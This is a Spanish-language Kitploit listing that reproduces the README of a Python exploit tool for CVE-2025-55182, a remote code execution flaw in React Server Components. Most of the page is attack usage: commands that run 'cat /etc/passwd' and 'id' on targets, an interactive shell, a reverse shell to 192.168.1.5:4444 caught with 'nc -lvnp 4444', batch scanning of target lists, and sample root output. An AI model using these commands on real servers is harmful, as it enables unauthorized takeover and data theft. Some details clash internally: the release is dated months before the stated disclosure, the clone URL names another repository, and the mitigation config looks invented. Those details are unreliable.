Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182_liyon — Exploit basado en Python para CVE-2025-55182 (RCE en React Server Components) con shell interactivo, reverse shell, escaneo por lotes y entorno vulnerable basado en Docker para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed Teaming
Herramienta de Acceso Remoto
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

Exploit basado en Python para CVE-2025-55182 (RCE en React Server Components) con shell interactivo, reverse shell, escaneo por lotes y entorno vulnerable basado en Docker para pruebas de seguridad autorizadas.

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 - RCE en Componentes del Servidor de React

⚠️ Aviso legal: Esta herramienta es solo para fines de investigación de seguridad, pruebas de penetración autorizadas y educación. Usar esta herramienta contra sistemas objetivo sin permiso explícito es ilegal y poco ético.

📋 Resumen

CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código (RCE) en React Server Components (RSC), que permite a atacantes no autenticados ejecutar código arbitrario en el servidor mediante la deserialización de JavaScript malicioso.

🎯 Detalles de la vulnerabilidad

PropiedadValor
CVE IDCVE-2025-55182
Puntuación CVSS9.8 (Crítico)
Vector de ataqueRed
Complejidad del ataqueBaja
Privilegios requeridosNinguno
Interacción del usuarioNinguna
ImpactoAlto (Confidencialidad, Integridad, Disponibilidad)
Componente afectadoReact Server Components (RSC)
Versiones afectadasReact 18.x - 19.x (versiones de compilación específicas)
Fecha de divulgación3 de diciembre de 2025
Alias CVEReact2Shell

🔍 Detalles técnicos

Causa raíz: React Server Components deserializa incorrectamente objetos JavaScript proporcionados por el usuario al procesar cargas útiles de RSC, permitiendo a atacantes inyectar código malicioso que se ejecuta en el servidor.

Vector de ataque: Carga útil maliciosa de RSC en solicitudes HTTP Impacto: Ejecución remota de código sin autenticación, toma de control del servidor, fuga de datos

🚀 Características

  • ✅ Herramienta de explotación Python en un solo archivo con shell interactivo
  • ✅ Detección automatizada de vulnerabilidades
  • ✅ Escaneo por lotes con soporte multiproceso
  • ✅ Entorno React vulnerable basado en Docker
  • ✅ Soporte para múltiples tipos de carga útil
  • ✅ Registro detallado y manejo de errores
  • ✅ Establecimiento de shell inversa
  • ✅ Codificación de carga útil en Base64

📦 Instalación

root@kitploit:~
# Clonar repositorio
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# Instalar dependencias
pip install -r requirements.txt

🎯 Uso

Inicio rápido

root@kitploit:~
# Instalar dependencias
pip install requests

# Ejecutar comando en objetivo vulnerable
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# Modo shell interactivo
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

Opciones avanzadas

root@kitploit:~
# Comando personalizado
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# Establecer shell inversa con IP/puerto personalizados
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# Escaneo por lotes
python exploit/batch_scanner.py -f targets.txt

# Modo detallado
python exploit/cve_2025_55182.py -u http://target.com -v

# User-Agent personalizado
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ Configuración del entorno de práctica

Usando Docker (recomendado)

root@kitploit:~
cd target
docker-compose up -d

Configuración manual

root@kitploit:~
cd target
npm install
npm run dev

Accede a la aplicación vulnerable: http://localhost:3000

📊 Escenarios de ataque

Escenario 1: Ejecución de comandos

Ejecutar un solo comando en el servidor vulnerable:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

Salida esperada:

root@kitploit:~
[+] Vulnerabilidad detectada con éxito: React Server Components RCE
[+] Ejecutando comando: id
[+] Respuesta:
uid=0(root) gid=0(root) groups=0(root)

Escenario 2: Shell interactivo

Obtener un shell interactivo en el servidor vulnerable:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

Características:

  • Autocompletado con tabulador
  • Historial de comandos
  • Múltiples sesiones de shell
  • Carga/descarga de archivos

Escenario 3: Shell inversa

Establecer una conexión de shell inversa:

root@kitploit:~
# En la máquina del atacante
nc -lvnp 4444

# Ejecutar la herramienta de explotación
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

Escenario 4: Escaneo por lotes

Escanear múltiples objetivos en busca de la vulnerabilidad:

root@kitploit:~
# Crear archivo de objetivos
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# Ejecutar escáner por lotes
python exploit/batch_scanner.py -f targets.txt

🛡️ Mitigación y defensa

Acciones inmediatas

  1. Actualizar React

    root@kitploit:~
    npm install react@latest
    # Actualizar a la versión corregida
    
  2. Bloquear solicitudes RSC

    root@kitploit:~
    // Deshabilitar temporalmente RSC
    const config = {
      enableRSC: false
    }
    
  3. Reglas WAF

    • Bloquear solicitudes que contengan patrones RSC
    • Monitorear cargas útiles JavaScript sospechosas
    • Aplicar limitación de velocidad en endpoints RSC

Correcciones a largo plazo

  • Implementar validación de entrada para cargas útiles RSC
  • Usar ejecución JavaScript en entorno aislado (sandbox)
  • Auditorías de seguridad periódicas
  • Monitorear accesos RSC no autorizados

📚 Documentación

  • Análisis de vulnerabilidad - Análisis técnico profundo
  • Guía de uso - Instrucciones completas
  • Defensa y corrección - Fortalecimiento de seguridad

🧪 Pruebas

Pruebas manuales

root@kitploit:~
# Configurar entorno vulnerable
cd target && docker-compose up -d

# Probar vulnerabilidad
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

Pruebas automatizadas

root@kitploit:~
# Ejecutar suite de pruebas
python tests/test_exploit.py

🔬 Referencias de investigación

  • Entrada de NVD para CVE-2025-55182
  • Aviso de seguridad de React
  • Blog de investigación de Wiz
  • Análisis de Project Zero

📝 Registro de cambios

v1.0.0 (2025-04-02)

  • Publicación inicial
  • Explotación RCE de un solo objetivo
  • Modo shell interactivo
  • Soporte de shell inversa
  • Escaneo por lotes
  • Entorno vulnerable Docker
  • Documentación completa

🎓 Propósito educativo

Esta herramienta demuestra:

  • Cómo funciona la vulnerabilidad RCE en React
  • Prácticas correctas de desarrollo de exploits
  • Métodos de evaluación de seguridad
  • Principios de hacking ético

👥 Contribuyentes

  • Investigador de seguridad - Implementación inicial

📄 Licencia

Este proyecto está licenciado bajo MIT - consulte el archivo LICENSE.

⚠️ Aviso legal y ético

Importante: Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas.

Requisitos legales

  • Úsela únicamente en sistemas de su propiedad o con permiso explícito para pruebas
  • Cumpla con todas las leyes y regulaciones aplicables
  • Reporte vulnerabilidades al proveedor de manera responsable
  • Siga las pautas de divulgación responsable

Comportamiento prohibido

  • Acceso no autorizado a sistemas informáticos
  • Atacar sistemas sin permiso
  • Usar la vulnerabilidad con fines maliciosos
  • Filtrar o destruir datos

Consecuencias legales

  • Cargos penales por acceso no autorizado
  • Responsabilidad civil por daños
  • Posible tiempo de prisión
  • Consecuencias profesionales

Al usar esta herramienta, usted acepta:

  • Cumplir con todas las leyes locales e internacionales
  • Usarla solo para pruebas de seguridad autorizadas
  • Reportar vulnerabilidades encontradas de manera responsable
  • No usarla para actividades maliciosas o ilegales

📞 Reportar vulnerabilidad

Si descubre esta vulnerabilidad en sistemas de producción:

  1. Reportar al proveedor

    • Equipo de React: [email protected]
    • Seguir divulgación responsable
  2. Asignación CVE

    • Enviar a NIST NVD
    • Seguir cronograma de divulgación
  3. Comunidad de seguridad

    • Compartir hallazgos (después del parche)
    • Contribuir al conocimiento de seguridad

Recuerde: La investigación de seguridad siempre debe ser ética y legal. ¡Use sus habilidades para hacer Internet más seguro! 🛡️

Descargar herramienta